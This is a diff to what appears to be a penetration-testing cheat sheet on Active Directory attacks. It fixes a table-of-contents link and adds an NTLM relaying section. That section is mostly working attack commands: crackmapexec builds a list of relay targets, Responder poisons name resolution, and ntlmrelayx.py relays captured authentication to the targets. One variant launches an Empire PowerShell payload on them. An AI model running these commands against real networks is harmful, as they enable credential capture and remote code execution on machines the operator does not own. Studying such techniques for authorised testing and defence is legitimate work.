|
|
@@ -15,7 +15,7 @@ tags: [windows, security, network, AD]
|
|
|
* [More Advanced Attacks](#more-advanced-attacks)
|
|
|
* [Kerberoasting](#kerberoasting)
|
|
|
* [AS-REP Roast](#as-rep-roast)
|
|
|
- * [NTLM relaying attack](ntlm-relaying-attack)
|
|
|
+ * [NTLM relaying attack](#ntlm-relaying-attack)
|
|
|
|
|
|
|
|
|
## Low Hanging Fruits
|
|
|
@@ -273,4 +273,31 @@ PS> Get-DomainUser -PreauthNotRequired
|
|
|
|
|
|
### NTLM relaying attack
|
|
|
|
|
|
+* Creating a list of potential targets with `crackmapexec`
|
|
|
+
|
|
|
+```
|
|
|
+sh> cme smb computers.txt --gen-relay-list targets.txt
|
|
|
+```
|
|
|
+
|
|
|
+* Start responder (with the HTTP & SMB server turned off):
|
|
|
+
|
|
|
+```
|
|
|
+sh> python Responder.py -I <interface> -r -d -w
|
|
|
+```
|
|
|
+
|
|
|
+* Start the NTLM relaying with `ntlmrelayx.py` using the targets from above:
|
|
|
+
|
|
|
+```
|
|
|
+sh> ntlmrelayx.py -tf targets.txt
|
|
|
+```
|
|
|
+
|
|
|
+* This can also be used to execute an custom executable (e.g. empire launcher):
|
|
|
+
|
|
|
+```
|
|
|
+sh> ntlmrelayx.py -tf targets.txt -c <insert your Empire Powershell launcher here>
|
|
|
+```
|
|
|
+
|
|
|
+#### References:
|
|
|
+
|
|
|
+* [https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html)
|
|
|
|
Marius Schwarz